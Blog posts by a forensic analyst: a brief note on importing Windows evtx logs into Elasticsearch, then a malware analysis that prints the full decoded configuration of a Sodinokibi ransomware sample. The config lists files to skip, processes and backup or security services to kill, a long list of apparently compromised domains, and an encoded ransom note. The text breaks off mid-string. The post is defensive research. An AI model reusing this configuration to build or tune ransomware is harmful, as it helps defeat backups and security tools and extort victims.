Importing Windows Event Logs into Elasticsearch

January 1, 2021 · One min read

Senior Forensic Analyst

Historically, there were two options to import Windows Event Logs into Elasticsearch:

using Winlogbeat, which requires a running Windows machine
using plaso, which works only with complete images, but not with triage data, such as some evtx files. Additionally, plaso doesn't soupport elasticsearch 7 or above, so this is not an option.

As a result, I decided to implement a script which imports a bunch of evtx files into an elasticsearch index:

At the moment, you need to create an own index template to make sure that all event_data fields are imported as text: No index template is required anymore.

Does Sodinokibi use bad crypto?

January 8, 2020 · 4 min read

Jan Starke

Senior Forensic Analyst

During the last days I was able to analyze a sample of the Sodinokibi ransomware (9fde430060112b2ebe83536cfd9de49d0cda04be1e7d83d848fbf68b30855fde).

During the dynamic investigation I discovered that the malware contains a PE section named .lfge4i. The content of this section is being decoded during execution and contains the following content (I formatted it to improve readability):

 {
   "pk":"3sB5vqBW0kuO3Nr56Ql+TMjaDchoEjxcKxBA/XbSJks=",
   "pid":"48",
   "sub":"2360",
   "dbg":false,
   "fast":false,
   "wipe":true,
   "wht":{
      "fld":[
         "$windows.~bt",
         "program files",
         "google",
         "program files (x86)",
         "boot",
         "msocache",
         "system volume information",
         "mozilla",
         "application data",
         "appdata",
         "perflogs",
         "tor browser",
         "programdata",
         "windows",
         "$recycle.bin",
         "$windows.~ws",
         "windows.old",
         "intel"
      ],
      "fls":[
         "iconcache.db",
         "bootfont.bin",
         "bootsect.bak",
         "thumbs.db",
         "ntuser.ini",
         "ntldr",
         "autorun.inf",
         "boot.ini",
         "ntuser.dat",
         "desktop.ini",
         "ntuser.dat.log"
      ],
      "ext":[
         "com",
         "bat",
         "cur",
         "scr",
         "diagpkg",
         "lnk",
         "icl",
         "diagcfg",
         "lock",
         "msc",
         "msu",
         "ani",
         "cpl",
         "386",
         "hta",
         "cmd",
         "ocx",
         "shs",
         "hlp",
         "exe",
         "ico",
         "nls",
         "adv",
         "bin",
         "icns",
         "theme",
         "drv",
         "wpx",
         "spl",
         "cab",
         "msstyles",
         "sys",
         "msi",
         "themepack",
         "msp",
         "mpa",
         "deskthemepack",
         "key",
         "idx",
         "mod",
         "rom",
         "prf",
         "nomedia",
         "dll",
         "diagcab",
         "ps1",
         "ics",
         "rtp",
         "ldf"
      ]
   },
   "wfld":[
      "backup"
   ],
   "prc":[
      "xfssvccon",
      "thebat",
      "firefox",
      "dbsnmp",
      "synctime",
      "mydesktopqos",
      "msaccess",
      "outlook",
      "tbirdconfig",
      "isqlplussvc",
      "mydesktopservice",
      "steam",
      "visio",
      "wordpad",
      "winword",
      "infopath",
      "agntsvc",
      "mspub",
      "ocomm",
      "ocautoupds",
      "encsvc",
      "powerpnt",
      "thunderbird",
      "oracle",
      "onenote",
      "sql",
      "excel",
      "ocssd",
      "dbeng50",
      "sqbcoreservice"
   ],
   "dmn":"letterscan.de;evsynthacademy.org;avtoboss163.ru:443;brinkdoepke.eu;cp-bap.de;landgoedspica.nl;greenrider.nl;lunoluno.com;cymru.futbol;kdbrh.com;from02pro.com;thegrinningmanmusical.com;cleanroomequipment.ie;jlgraphisme.fr;awaisghauri.com;internalresults.com;internestdigital.com;pajagus.fr;larchwoodmarketing.com;askstaffing.com;beandrivingschool.com.au;utilisacteur.fr;ziliak.com;auberives-sur-vareze.fr;aheadloftladders.co.uk;ox-home.com;liverpoolabudhabi.ae;jayfurnitureco.com;agriturismocastagneto.it;jmmartinezilustrador.com;airserviceunlimited.com;nginx.com;amelielecompte.wordpress.com;eurethicsport.eu;funworx.de;hotelturbo.de;collegetennis.info;successcolony.com.ng;gardenpartner.pl;cotton-avenue.co.il;k-v-f.de;sarahspics.co.uk;phukienbepthanhdat.com;devus.de;universelle.fr;fla.se;hekecrm.com;agendatwentytwenty.com;tastevirginia.com;geoweb.software;valiant-voice.com;webforsites.com;tbalp.co.uk;espaciopolitica.com;jalkapuu.net;rossomattonecase.it;pedmanson.com;globalskills.pt;epsondriversforwindows.com;suitesartemis.gr;drvoip.com;dayenne-styling.nl;eastgrinsteadwingchun.com;boloria.de;muni.pe;angelsmirrorus.com;bcmets.info;mundo-pieces-auto.fr;makingmillionaires.net;yvesdoin-aquarelles.fr;furland.ru;saboboxtel.uk;baikalflot.ru;anleggsregisteret.no;yuanshenghotel.com;hnkns.com;ygallerysalonsoho.com:443;gavelmasters.com;chinowarehousespace.com;strauchs-wanderlust.info;bulyginnikitav.000webhostapp.com;lexced.com;iexpert99.com;lgiwines.com;kellengatton.com;sytzedevries.com;veggienessa.com;antesacademy.it;mustangmarketinggroup.com;professionetata.com;alcye.com;mieleshopping.it;digitale-elite.de;floweringsun.org;frankgoll.com;kryddersnapsen.dk;christianscholz.de;tatyanakopieva.ru;uci-france.fr;zdrowieszczecin.pl;kickittickets.com;denhaagfoodie.nl;bodet150ans.com;fbmagazine.ru;cookinn.nl;vdolg24.online;onlinetvgroup.com;abulanov.com;renderbox.ch;jaaphoekzema.nl;oportowebdesign.com;queertube.net;frimec-international.es;klapanvent.ru;indiebizadvocates.org;miscbo.it;aktivfriskcenter.se;yourcosmicbeing.com;t3brothers.com;springfieldplumbermo.com;saint-malo-developpement.fr;innovationgames-brabant.nl;bohrlochversicherung.info;bertbutter.nl;3daywebs.com;forextimes.ru;dentallabor-luenen.de;specialtyhomeservicesllc.com;molinum.pt;cmeow.com;teethinadaydentalimplants.com;mrmac.com;acornishstudio.co.uk;ronaldhendriks.nl;jlwilsonbooks.com;campusce.com;kryptos72.com;levencovka.ru;stressreliefadvice.com;sjtpo.org;harleystreetspineclinic.com;dentourage.com;elex.is;fotoeditores.com;mursall.de;hostingbangladesh.net;alnectus.com;unexplored.gr;reputation-medical.online;smartspeak.com;sololibrerie.it;janasfokus.com;fixx-repair.com;agenceassemble.fr;unboxtherapy.site;bundan.com;arazi.eus;patassociation.com;magrinya.net;hotjapaneselesbian.com;lovcase.com;morgansconsult.com;skinkeeper.li;omnicademy.com;tetameble.pl;albcleaner.fr;fotoslubna.com;nrgvalue.com;elitkeramika-shop.com.ua;mariamalmahdi.com;wademurray.com;testitjavertailut.net;skidpiping.de;ya-elka.ru;alharsunindo.com;theboardroomafrica.com;theintellect.edu.pk;matteoruzzaofficial.com;jimprattmediations.com;vapiano.fr;perceptdecor.com;gurutechnologies.net;photonag.com;laaisterplakky.nl;globalcompliancenews.com;voice2biz.com;phoenixcrane.com;mondolandscapes.com;datatri.be;scotlandsroute66.co.uk;slotenmakerszwijndrecht.nl;a-zpaperwork.eu;descargandoprogramas.com;cincinnatiphotocompany.org;directique.com;claudiakilian.de;sealgrinderpt.com;stringnosis.academy;arabianmice.com;bjornvanvulpen.nl;jdscenter.com;pokemonturkiye.com;billyoart.com;the-beauty-guides.com;kompresory-opravy.com;mjk.digital;slotspinner.com;enactusnhlstenden.com;hvitfeldt.dk;julielusktherapy.com;juergenblaetz.de;tweedekansenloket.nl;carolynfriedlander.com;leadforensics.com;protoplay.ca;ronielyn.com;lsngroupe.com;richardmaybury.co.uk;oro.ae;nauticmarine.dk;whoopingcrane.com;towelroot.co;prodentalblue.com;mazzaropi.com.br;clemenfoto.dk;comoserescritor.com;modamarfil.com;wallflowersandrakes.com;awag-blog.de;goodherbalhealth.com;ivancacu.com;kelsigordon.com;primemarineengineering.com;linkbuilding.life;jobstomoveamerica.org;scietech.academy;apiarista.de;goodboyscustom.com;jeanmonti.com;greeneyetattoo.com;boomerslivinglively.com;rozmata.com;so-sage.fr;andreaskildegaard.dk;hutchstyle.co.uk;atrgroup.it;witraz.pl;leopoldineroux.com;katherinealy.com;angeleyezstripclub.com;geitoniatonaggelon.gr;acb-gruppe.ch;hostastay.com;quitescorting.com;malzomattalar.com;scentedlair.com;o2o-academy.com;alpesiberie.com;reizenmetkinderen.be;aslog.fr;lagschools.ng;monstarrsoccer.com;mbuildinghomes.com;altitudeboise.com;stitch-n-bitch.com;holocine.de;werkzeugtrolley.net;limounie.com;lapponiasafaris.com;markseymourphotography.co.uk;fire-space.com;transifer.fr;bmw-i-pure-impulse.com;ruggestar.ch;malevannye.ru;curtsdiscountguns.com;ultimatelifesource.com;lattalvor.com;operativadigital.com;buerocenter-butzbach-werbemittel.de;advanced-removals.co.uk;artvark.nl;eksperdanismanlik.com;alattekniksipil.com;focuskontur.com;latteswithleslie.com;goeppinger-teppichreinigung.de;advancedeyecare.com;silkeight.com;theater-lueneburg.de;hameghlim.com;bridalcave.com;turing.academy;marmarabasin.com;bodymindchallenger.com;o90.dk;g2mediainc.com;smarttourism.academy;xn--ziinoapte-6ld.ro;computer-place.de;distrifresh.com;test-teleachat.fr;rhino-storage.co.uk;mediogiro.com.ar;spartamovers.com;circuit-diagramz.com;blavait.fr;adedesign.com;sshomme.com;vipcarrental.ae;bg.szczecin.pl;craftingalegacy.com;tzn.nu;acumenconsultingcompany.com;kroophold-sjaelland.dk;flossmoordental.com;simpleitsolutions.ch;tilldeeke.de;martinipstudios.com;sochi-okna23.ru;foerderverein-vatterschule.de;carmel-york.com;metriplica.academy;axisoflove.org:443;heuvelland-oaze.nl;putzen-reinigen.com;physio-lang.de;skolaprome.eu;lmmont.sk;boyfriendsgoal.site;edrickennedymacfoy.com;cuadc.org;thenalpa.com;startuplive.org;finsahome.co.uk;heimdalbygg.no;stoneridgemontessori.com;inewsstar.com;carsten.sparen-it.de;fann.ru;topautoinsurers.net;mazift.dk;line-x.co.uk;hoteltantra.com;graygreenbiomedservices.com;powershell.su;spectamarketingdigital.com.br;wrinstitute.org;scholarquotes.com;rsidesigns.com;levelseven.be;narca.net;relevantonline.eu;jollity.hu;walterman.es;campusescalade.com;slideevents.be;diakonie-weitramsdorf-sesslach.de;brighthillgroup.com;perfectgrin.com;initconf.com;loparnille.se;nuohous.com;mesajjongeren.nl;pazarspor.org.tr;cssp-mediation.org;gta-jjb.fr;centuryvisionglobal.com;ownidentity.com;rivermusic.nl;imagine-entertainment.com;linearete.com;publicompserver.de;allinonecampaign.com;keuken-prijs.nl;bumbipdeco.site;alwaysdc.com;sprintcoach.com;drbenveniste.com;buzzneakers.com;dmlcpa.com;edvestors.org;dcc-eu.com;nalliasmali.net;hepishopping.com;worldproskitour.com;sachainchiuk.com;michaelfiegel.com;kafkacare.com;mikegoodfellow.co.uk;rolleepollee.com;almamidwifery.com;hawaiisteelbuilding.com;bluelakevision.com;mike.matthies.de;afbudsrejserallinclusive.dk;trainiumacademy.com;insane.agency;peppergreenfarmcatering.com.au;2020hindsight.info;mangimirossana.it;ebible.co;leloupblanc.gr;avisioninthedesert.com;sbit.ag;maxcube24.com.ua;oexebusiness.com;vitoriaecoturismo.com.br;christopherhannan.com;mercadodelrio.com;ikzoekgod.be;glas-kuck.de;kartuindonesia.com;orchardbrickwork.com;bescomedical.de;mediabolmong.com;maryairbnb.wordpress.com;dreamvoiceclub.org;housesofwa.com;paprikapod.com;csaballoons.com;ikadomus.com;mac-computer-support-hamburg.de;die-immo-agentur.de;licensed-public-adjuster.com;fysiotherapierijnmond.nl;nutriwell.com.sg;rattanwarehouse.co.uk;alaskaremote.com;eos-horlogerie.com;karelinjames.com;pourlabretagne.bzh;iactechnologies.net;ingresosextras.online;jakubrybak.com;nicksrock.com;ykobbqchicken.ca;netadultere.fr;nvisionsigns.com;production-stills.co.uk;onesynergyinternational.com;placermonticello.com;schlagbohrmaschinetests.com;mamajenedesigns.com;pankiss.ru;olry-cloisons.fr;rarefoods.ro;agrifarm.dk;betterce.com;kemtron.fr;littlesaints.academy;keyboardjournal.com;hinotruckwreckers.com.au;encounter-p.net;pharmeko-group.com;taulunkartano.fi;apmollerpension.com;5thactors.com;cap29010.it;metcalfe.ca;9nar.com;xn--80abehgab4ak0ddz.xn--p1ai;glennverschueren.be;solidhosting.nl;tutvracks.com;sveneulberg.de;factoriareloj.com;creohn.de;bajova.sk;manzel.tn;cops4causes.org;vvego.com;penumbuhrambutkeiskei.com;parseport.com;factorywizuk.com;oraweb.net;johnstonmingmanning.com;p-ride.live;matthieupetel.fr;limmortelyouth.com;premiumweb.com.ua:443;hiddensee-buhne11.de;switch-made.com;nationnewsroom.com;go.labibini.ch;electricianul.com;ceocenters.com;pvandambv.nl;selected-minds.de;four-ways.com;speiserei-hannover.de;skooppi.fi;agencewho-aixenprovence.fr;benchbiz.com;fta-media.com;innervisions-id.com;bourchier.org;cmascd.com;denverwynkoopdentist.com;jobscore.com;subquercy.fr;ahgarage.com;wordpress.idium.no;khtrx.com;ncn.nl;chomiksy.net;goddardleadership.org;toranjtuition.org;thestudio.academy;hensleymarketing.com;bayshoreelite.com;mgimalta.com;guohedd.com;brisbaneosteopathic.com.au;stralsund-ansichten.de;redpebblephotography.com;amorbellezaysalud.com;bellesiniacademy.org;letsstopsmoking.co.uk;amco.net.au;haus-landliebe.de;look.academy;tieronechic.com;expohomes.com;rizplakatjaya.com;blueridgeheritage.com;renehartman.nl;rino-gmbh.com;yayasanprimaunggul.org;ufovidmag.com;ocduiblog.com;breakluckrecords.com;myplaywin3.com;nexstagefinancial.com;ncjc.ca;envomask.com;mindfuelers.com;buffdaddyblog.com;the-cupboard.co.uk;concontactodirecto.com;marcandy.com;bratek-immobilien.de;log-barn.co.uk;rechtenplicht.be;victorvictoria.com;jobkiwi.com.ng;domilivefurniture.com;citiscapes-art.com;nbva.co.uk;smartworkplaza.com;altocontatto.net;rentingwell.com;advance-refle.com;wasnederland.nl;cyberpromote.de;supercarhire.co.uk;encounter-p.net;moira-cristescu.com;stanleyqualitysystems.com;lyricalduniya.com;memphishealthandwellness.com;c-sprop.com;jglconsultancy.com;humanviruses.org;texanscan.org;pureelements.nl;dieetuniversiteit.nl;palmenhaus-erfurt.de;egpu.fr;clinic-beethovenstrasse-ag.ch;pinkxgayvideoawards.com;lidkopingsnytt.nu;thiagoperez.com;arthakapitalforvaltning.dk;business-basic.de;mollymccarthydesign.com;trevi-vl.ru;gbk-tp1.de;grupoexin10.com;aciscomputers.com;zumrutkuyutemel.com;paardcentraal.nl;dinedrinkdetroit.com;affligemsehondenschool.be;spirello.nl;adterium.com;luvbec.com;alltagsrassismus-entknoten.de;georgemuncey.com;unislaw-narty.pl;poems-for-the-soul.ch;legundschiess.de;yournextshoes.com;sweetz.fr;m2graph.fr;rentsportsequip.com;berdonllp.com;chatterchatterchatter.com;glende-pflanzenparadies.de;ledyoucan.com;mediahub.co.nz;daveystownhouse.com;bendel-partner.de;galatee-couture.com;loysonbryan.com;kristianboennelykke.dk;catchup-mag.com;deziplan.ru;thepixelfairy.com;ziliak.com;cascinarosa33.it;dantreranch.com;grancanariaregional.com;invela.dk;gosouldeep.com;finnergo.eu;zealcon.ae;achetrabalhos.com;bruut.online;kerstliedjeszingen.nl;fi-institutionalfunds.com;sber-biznes.com;alexwenzel.de;amyandzac.com;schroederschoembs.com;adabible.org;chainofhopeeurope.eu;1deals.com;block-optic.com;auto-opel.ro;fidelitytitleoregon.com;teutoradio.de;billscars.net;craftstone.co.nz;happycatering.de;rhino-turf.com;reygroup.pt;rokthetalk.com;web865.com;fazagostar.co;craftron.com;anchelor.com;drnelsonpediatrics.com;subyard.com;avis.mantova.it;triplettabordeaux.fr;bakingismyyoga.com;karmeliterviertel.com;techybash.com;acibademmobil.com.tr;ziliak.com;johnkoen.com;precisetemp.com;nieuwsindeklas.be;forskolinslimeffect.net;rubyaudiology.com;muller.nl;annida.it;watchsale.biz;breathebettertolivebetter.com;rvside.com;davedavisphotos.com;welovecustomers.fr;futurenetworking.com;tanatek.com;pinthelook.com;azerbaycanas.com;ideamode.com;rename.kz;endlessrealms.net;astrographic.com;kamin-somnium.de;napisat-pismo-gubernatoru.ru:443;jag.me;pilotgreen.com;biketruck.de;circlecitydj.com;dierenambulancealkmaar.nl;alene.co;mrkluttz.com;animation-pro.co.uk;bd2fly.com;frameshift.it;theatre-embellie.fr;gsconcretecoatings.com;topvijesti.net;neonodi.be;jameswilliamspainting.com;outstandingminialbums.com;awaitspain.com;mind2muscle.nl;n-newmedia.de;wg-heiligenstadt.de;motocrosshideout.com;ntinasfiloxenia.gr;patriotcleaning.net;baita.ac;min-virksomhed.dk;chorusconsulting.net;activeterroristwarningcompany.com;entdoctor-durban.com;fsbforsale.com;birthplacemag.com;smartmind.net;endstarvation.com;proffteplo.com;90nguyentuan.com;palema.gr;cardsandloyalty.com;jax-interim-and-projectmanagement.com;thegetawaycollective.com;midwestschool.org;omegamarbella.com;enews-qca.com;trivselsguide.dk;sambaglow.com;kiraribeaute-nani.com;mindsparkescape.com;opt4cdi.com;zuerich-umzug.ch;yourhappyevents.fr;magnetvisual.com;arearugcleaningnyc.com;111firstdelray.com;bubbalucious.com;richardkershawwines.co.za;site.markkit.com.br;wribrazil.com;gazelle-du-web.com;animalfood-online.de;redctei.co;dinecorp.com;innersurrection.com;donau-guides.eu;imaginekithomes.co.nz;husetsanitas.dk;the3-week-diet.net;catalyseurdetransformation.com;blucamp.com;wyreforest.net;tchernia-conseil.fr;tages-geldvergleich.de;brunoimmobilier.com;onlinemarketingsurgery.co.uk;akwaba-safaris.com;charlesfrancis.photos;rs-danmark.dk;etgdogz.de;promus.ca;thisprettyhair.com;istantidigitali.com;artcase.pl;interlinkone.com;kenmccallum.com;casinodepositors.com;beauty-traveller.com;triavlete.com;banukumbak.com;mahikuchen.com;verbouwingsdouche.nl;galaniuklaw.com;livelai.com;eventosvirtualesexitosos.com;chris-anne.com;secrets-clubs.co.uk;myfbateam.com;the5thquestion.com;voetbalhoogeveen.nl;sunsolutions.es;kookooo.com;janellrardon.com;explora.nl;haard-totaal.nl;diverfiestas.com.es;druktemakersheerenveen.nl;neolaiamedispa.com;catering.com;optigas.com;nepressurecleaning.com;dogsunlimitedguide.com;innovationgames-brabant.nl;ciga-france.fr;peninggibadan.co.id;belofloripa.be;ilveshistoria.com;silverbird.dk;paradigmlandscape.com;asiaartgallery.jp;suonenjoen.fi;framemyballs.com;vedsegaard.dk;projektparkiet.pl;agora-collectivites.com;belinda.af;xn--billigafrgpatroner-stb.se;profibersan.com;fluzfluzrewards.com;nevadaruralhousingstudies.org;atma.nl;qandmmusiccenter.com;aidanpublishing.co.uk;andrealuchesi.it;molade.nl;mayprogulka.ru;bringmehope.org;forumsittard.nl;eatyoveges.com;raeoflightmusic.com;elliemaccreative.wordpress.com;barbaramcfadyenjewelry.com;delegationhub.com;cainlaw-okc.com;hom-frisor.dk;terraflair.de;mensemetgesigte.co.za;soncini.ch;lifeinbreaths.com;lashandbrowenvy.com;pansionatblago.ru;ijsselbeton.nl;deduktia.fi;jandhpest.com;advesa.com;photographycreativity.co.uk;cl0nazepamblog.com;dentalcircle.com;handyman-silkeborg.dk;biodentify.ai;global-migrate.com;pxsrl.it;andermattswisswatches.ch;krishnabrawijaya.com;janmorgenstern.com;akcadagofis.com;designimage.ae;sharonalbrightdds.com;brownswoodblog.com;aoyama.ac;rtc24.com;shrinkingplanet.com;aberdeenartwalk.org;imajyuku-sozoku.com;qrs-international.com;azloans.com;kenmccallum.com;energosbit-rp.ru;xrresources.com;basindentistry.com;corporacionrr.com;kuriero.pro;pro-gamer.pl;shortsalemap.com;logosindustries.com;rishigangoly.com;salonlamar.nl;latableacrepes-meaux.fr;pisofare.co;mslp.org;colored-shelves.com;kombi-dress.com;oscommunity.de;natturestaurante.com.br;qwikcoach.com;coachpreneuracademy.com;dr-vita.de;metroton.ru;alabamaroofingllc.com;lassocrm.com;grafikstudio-visuell.de;xtensifi.com;spacebel.be;lookandseen.com;greatofficespaces.net;koncept-m.ru;tothebackofthemoon.com;thesilkroadny.com;skyboundnutrition.co.uk;stagefxinc.com;crestgood.com;luvinsburger.fr;teamsegeln.ch;buonabitare.com;fridakids.com;sppdstats.com;rapid5kloan.org;radishallgood.com;soundseeing.net;louiedager.com;martha-frets-ceramics.nl;bilius.dk;triplettagaite.fr;k-zubki.ru;atelierkomon.com;osn.ro;bonitabeachassociation.com;ludoil.it;broccolisoep.nl;mrcar.nl;hypogenforensic.com;parentsandkids.com;pubcon.com;parisschool.ru;citydogslife.com;medicalsupportco.com;gaearoyals.com;prometeyagro.com.ua;bluetenreich-brilon.de;volta.plus;der-stempelking.de;girlish.ae;tellthebell.website;cac2040.com;leatherjees.com;skoczynski.eu;airvapourbarrier.com;devplus.be;golfclublandgoednieuwkerk.nl;bcabattoirs.org;johnsonweekly.com;happylublog.wordpress.com;wineandgo.hu;oththukaruva.com;b3b.ch;direitapernambuco.com;michal-s.co.il;ninjaki.com;speakaudible.com;saberconcrete.com;docarefoundation.org;hartofurniture.com;lovetzuchia.com;duthler.nl;therapybusinessacademy.com;stabilisateur.fr;bluemarinefoundation.com;customroasts.com;jonnyhooley.com;otpusk.zp.ua;palmecophilippines.com;fanuli.com.au;biblica.com;aquacheck.co.za;nepal-pictures.com;campinglaforetdetesse.com;premier-iowa.com;cormanmarketing.com;baptistdistinctives.org;charlottelhanna.com;zwemofficial.nl;plbinsurance.com;augen-praxisklinik-rostock.de;fskhjalmar.se;xn--80addfr4ahr.dp.ua;bychowo.pl;satoblog.org;purepreprod4.com;drbrianhweeks.com;eafx.pro;nourella.com;gatlinburgcottage.com;cc-experts.de;fitnessblenderstory.com;autoteamlast.de;studionumerik.fr;metallbau-hartmann.eu;pixelhealth.net;randyabrown.com;itheroes.dk;lollachiro.com;adaduga.info;smartercashsystem.com;ced-elec.com;sellthewrightway.com;solutionshosting.co.uk;dennisverschuur.com;piestar.com;ruggestar.ch;pays-saint-flour.fr;shortysspices.com;ramirezprono.com;groovedealers.ru;bavovrienden.nl;traitware.com;5pointpt.com;oncarrot.com;masecologicos.com;kausette.com;iron-mine.ru;burg-zelem.de;laylavalentine.com;skyscanner.ro;schluesseldienste-hannover.de;mariannelemenestrel.com;hostaletdelsindians.es;banksrl.co.za;jacquesgarcianoto.com;liepertgrafikweb.at;11.in.ua;livedeveloper.com;irizar.com;santastoy.store;lesyeuxbleus.net;dibli.store;naukaip.ru;sycamoregreenapts.com;margaretmcshane.com;fascaonline.com;richardiv.com;signamedia.de;motocrossplace.co.uk;brannbornfastigheter.se;profiz.com;cesep2019.com;leijstrom.com;nxtstg.org;opticahubertruiz.com;kosten-vochtbestrijding.be;zaczytana.com;thehovecounsellingpractice.co.uk;polynine.com;ayudaespiritualtamara.com;billigeflybilletter.dk;singletonfinancial.com;stathmoulis.gr;noda.com.ua;alisodentalcare.com;stage-infirmier.fr;vitormmcosta.com;kvetymichalovce.sk;ravage-webzine.nl;tecleados.com;hospitalitytrainingsolutions.co.uk;liveyourheartout.co;uncensoredhentaigif.com;signededenroth.dk;domaine-des-pothiers.com;epicjapanart.com;zorgboerderijravensbosch.nl;chatberlin.de;zinnystar.com;parksideseniorliving.net;jefersonalessandro.com;gratiocafeblog.wordpress.com;bookingwheel.com;nykfdyrehospital.dk;apogeeconseils.fr;ilovefullcircle.com;mneti.ru;justaroundthecornerpetsit.com;tramadolhealth.com;condormobile.fr;mariajosediazdemera.com;cxcompany.com;tradenavigator.ch;wirmuessenreden.com;tesisatonarim.com;schulz-moelln.de;leansupremegarcinia.net;ketomealprep.academy;riffenmattgarage.ch;ddmgen.com;annenymus.com;racefietsenblog.nl;hawthornsretirement.co.uk;efficiencyconsulting.es;lisa-poncon.fr;babysitting-hk.helpergo.co;hm-com.com;easydental.ae;dnqa.co.uk;newonestop.com;eyedoctordallas.com;baumfinancialservices.com;weddingceremonieswithtim.com;angelika-schwarz.com;lumturo.academy;eshop.design;aceroprime.com;bagaholics.in",
   "net":false,
   "svc":[
      "mepocs",
      "veeam",
      "sql",
      "vss",
      "sophos",
      "memtas",
      "backup",
      "svc$"
   ],
   "nbody":"LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQByACAAcwB5AHMAdABlAG0AIABoAGEAcwAgAGUAeAB0AGUAbgBzAGkAbwBuACAAewBFAFgAVAB9AC4ADQAKAEIAeQAgAHQAaABlACAAdwBhAHkALAAgAGUAdgBlAHIAeQB0AGgAaQBuAGcAIABpAHMAIABwAG8AcwBzAGkAYgBsAGUAIAB0AG8AIAByAGUAYwBvAHYAZQByACAAKAByAGUAcwB0AG8AcgBlACkALAAgAGIAdQB0ACAAeQBvAHUAIABuAGUAZQBkACAAdABvACAAZgBvAGwAbABvAHcAIABvAHUAcgAgAGkAbgBzAHQAcgB1AGMAdABpAG8AbgBzAC4AIABPAHQAaABlAHIAdwBpAHMAZQAsACAAeQBvAHUAIABjAGEAbgB0ACAAcgBlAHQAdQByAG4AIAB5AG8AdQByACAAZABhAHQAYQAgACgATgBFAFYARQBSACkALgANAAoADQAKAFsAKwBdACAAVwBoAGEAdAAgAGcAdQBhAHIAYQBuAHQAZQBlAHMAPwAgAFsAKwBdAA0ACgANAAoASQB0AHMAIABqAHUAcwB0ACAAYQAgAGIAdQBzAGkAbgBlAHMAcwAuACAAVwBlACAAYQBiAHMAbwBsAHUAdABlAGwAeQAgAGQAbwAgAG4AbwB0ACAAYwBhAHIAZQAgAGEAYgBvAHUAdAAgAHkAbwB1ACAAYQBuAGQAIAB5AG8AdQByACAAZABlAGEAbABzACwAIABlAHgAYwBlAHAAdAAgAGcAZQB0AHQAaQBuAGcAIABiAGUAbgBlAGYAaQB0AHMALgAgAEkAZgAgAHcAZQAgAGQAbwAgAG4AbwB0ACAAZABvACAAbwB1AHIAIAB3AG8AcgBrACAAYQBuAGQAIABsAGkAYQBiAGkAbABpAHQAaQBlAHMAIAAtACAAbgBvAGIAbwBkAHkAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIAB1AHMALgAgAEkAdABzACAAbgBvAHQAIABpAG4AIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzAC4ADQAKAFQAbwAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAG8AZgAgAHIAZQB0AHUAcgBuAGkAbgBnACAAZgBpAGwAZQBzACwAIABZAG8AdQAgAHMAaABvAHUAbABkACAAZwBvACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAC4AIABUAGgAZQByAGUAIAB5AG8AdQAgAGMAYQBuACAAZABlAGMAcgB5AHAAdAAgAG8AbgBlACAAZgBpAGwAZQAgAGYAbwByACAAZgByAGUAZQAuACAAVABoAGEAdAAgAGkAcwAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUALgANAAoASQBmACAAeQBvAHUAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIABvAHUAcgAgAHMAZQByAHYAaQBjAGUAIAAtACAAZgBvAHIAIAB1AHMALAAgAGkAdABzACAAZABvAGUAcwAgAG4AbwB0ACAAbQBhAHQAdABlAHIALgAgAEIAdQB0ACAAeQBvAHUAIAB3AGkAbABsACAAbABvAHMAZQAgAHkAbwB1AHIAIAB0AGkAbQBlACAAYQBuAGQAIABkAGEAdABhACwAIABjAGEAdQBzAGUAIABqAHUAcwB0ACAAdwBlACAAaABhAHYAZQAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5AC4AIABJAG4AIABwAHIAYQBjAHQAaQBzAGUAIAAtACAAdABpAG0AZQAgAGkAcwAgAG0AdQBjAGgAIABtAG8AcgBlACAAdgBhAGwAdQBhAGIAbABlACAAdABoAGEAbgAgAG0AbwBuAGUAeQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQ